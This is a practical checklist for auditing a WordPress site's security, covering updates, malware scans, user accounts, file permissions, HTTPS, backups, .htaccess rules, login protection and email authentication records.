The majority of WordPress hacks are not sophisticated targeted attacks. They are automated scans looking for known vulnerabilities in outdated software, weak credentials, and misconfigured permissions. The good news: most of the gaps these attacks exploit are straightforward to close, and you do not need a security background to do it.
Set aside an afternoon and work through this checklist.
Check WordPress, Plugin, and Theme Update Status
Go to Dashboard > Updates. Any outdated WordPress core version, plugin, or theme is a potential entry point. Security vulnerabilities in plugins are the leading cause of WordPress compromises - attackers actively monitor vulnerability databases and scan for sites running the affected version.
Update everything. If a plugin has not released an update in two or more years and is not being actively maintained, consider replacing it with an actively maintained alternative.
Scan with Wordfence or Sucuri SiteCheck
Wordfence Security (free) includes a malware scanner that checks your WordPress files against the known-clean versions from wordpress.org, flags unexpected file modifications, and identifies known malicious code patterns.
Sucuri SiteCheck (sucuri.net/website-scanner) is a free online scanner that checks your site from the outside - detecting malware, blacklist status, and security headers without requiring plugin installation.
Run both. They check different things and complement each other. If either returns positive results, investigate before proceeding.
Review User Accounts
Go to Users > All Users. Review every account listed. Ask:
- Do you recognize every account?
- Are there administrator accounts you did not create?
- Are there usernames like "admin," "administrator," or "user1" that are common brute-force targets?
Unknown administrator accounts are a serious red flag indicating a possible prior compromise. Delete any account you do not recognize after verifying there is no legitimate reason for it to exist.
Check File Permissions
Incorrect file permissions are a common vulnerability. The general rules for WordPress:
- Folders should be 755 (owner can write, others can read and execute)
- Files should be 644 (owner can read/write, others can only read)
- wp-config.php should be 600 or 640 (restricted to owner only)
- No file or folder should be 777 (world-writable)
In cPanel, you can check and set permissions through File Manager. Select a file or folder, click "Change Permissions," and adjust accordingly. Wordfence also flags 777 permissions in its scan results.
Verify SSL Is Valid and HTTPS Is Forced
Check that your SSL certificate is valid and not expiring soon (cPanel shows SSL status, or use ssllabs.com for a detailed check). Then verify that all traffic is redirected to HTTPS - visiting http://yourdomain.ca should automatically redirect to https://yourdomain.ca.
In WordPress, go to Settings > General and confirm both the WordPress Address and Site Address use https://. In your .htaccess file (viewable in cPanel File Manager), confirm a redirect rule forces HTTPS.
Confirm Backups Are Running
A security audit is also the right time to verify your backup system is functioning. Check your backup plugin's log (UpdraftPlus shows last backup date and status). Confirm at least one recent backup exists at an off-server location. If you cannot confirm backups are current, fix this before anything else - backups are your recovery path if anything else on this list turns out to be too late.
Check .htaccess for Unexpected Rules
In cPanel File Manager, navigate to your public_html root and view your .htaccess file. You should recognize every rule in it. Malware commonly injects redirect rules into .htaccess that send visitors (but not you, logged in as admin) to spam sites.
A clean WordPress .htaccess looks simple - just the standard WordPress rewrite rules. If you see unexplained redirects, encoded strings, or rules you did not add, treat this as a potential compromise.
Test Login Page Protection
Visit yourdomain.ca/wp-login.php. Does it load? If so, it is publicly accessible to brute-force attacks. Consider:
- Login attempt limiting - Wordfence, Limit Login Attempts Reloaded, or your host's built-in protection
- Two-factor authentication - Wordfence includes 2FA for free; WP 2FA is another solid option
- Changing the login URL - plugins like WPS Hide Login move the login page away from the default
/wp-login.phppath, reducing automated attack volume
Verify SPF, DKIM, and DMARC Are in Place
Email spoofing - where attackers send email that appears to come from your domain - is a reputation and security risk. Three DNS records protect against it:
SPF specifies which servers are authorized to send email from your domain. DKIM adds a cryptographic signature to outgoing email. DMARC tells receiving servers what to do when SPF or DKIM fail.
You can check all three at mxtoolbox.com/emailhealth - enter your domain and it will show which records are present and whether they are configured correctly. cPanel's Email Deliverability tool also generates and helps you install these records.
The Result
Working through this checklist in a single afternoon closes the gaps that account for the majority of WordPress compromises. Set a reminder to repeat this audit every six months. Security is not a one-time project - it is an ongoing practice.
